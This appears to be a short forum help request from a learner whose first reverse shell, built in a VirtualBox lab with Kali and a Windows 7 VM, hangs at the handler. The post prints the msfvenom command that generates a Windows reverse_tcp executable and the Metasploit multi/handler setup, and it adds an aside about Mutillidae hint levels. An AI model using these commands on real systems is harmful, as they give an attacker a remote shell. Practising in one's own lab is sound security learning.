This is my first reverse shell. I used
msfvenom -p windows/shell/reverse_tcp LHOST=mykalivmip LPORT=4444 -f exe > evil.exe
I copy the evil.exe file over to windows 7 vm. Then I go back to metasploit and type
use exploit/multi/handler set payload windows/shell/reverse_tcp set lport 4444 set lhost mykalivmip exploit
set lhost mykalivmip
exploit
I also tried
set END SESSION ON START=false
right before exploit and that didn' work either. I am using VirtualBox version 5.0.20 kalivm 32bit and windowsvm 32bit with host ubunutu. I also tried a similiar windows meterpreter reverse tcp and get the same thing. This is what shows after exploit I also double click the evil.exe file in windows after exploit and get this
[*] Started reverse TCP handler on mykalivmip:4444
[*] Starting the payload handler...
It just gets stuck on this.
mutillidae on widows 7 vbox virtual machine toggle hints, only lets me toggle level script kiddie and disabled, missing noob.
update: Reinstalled, noob can now be selected.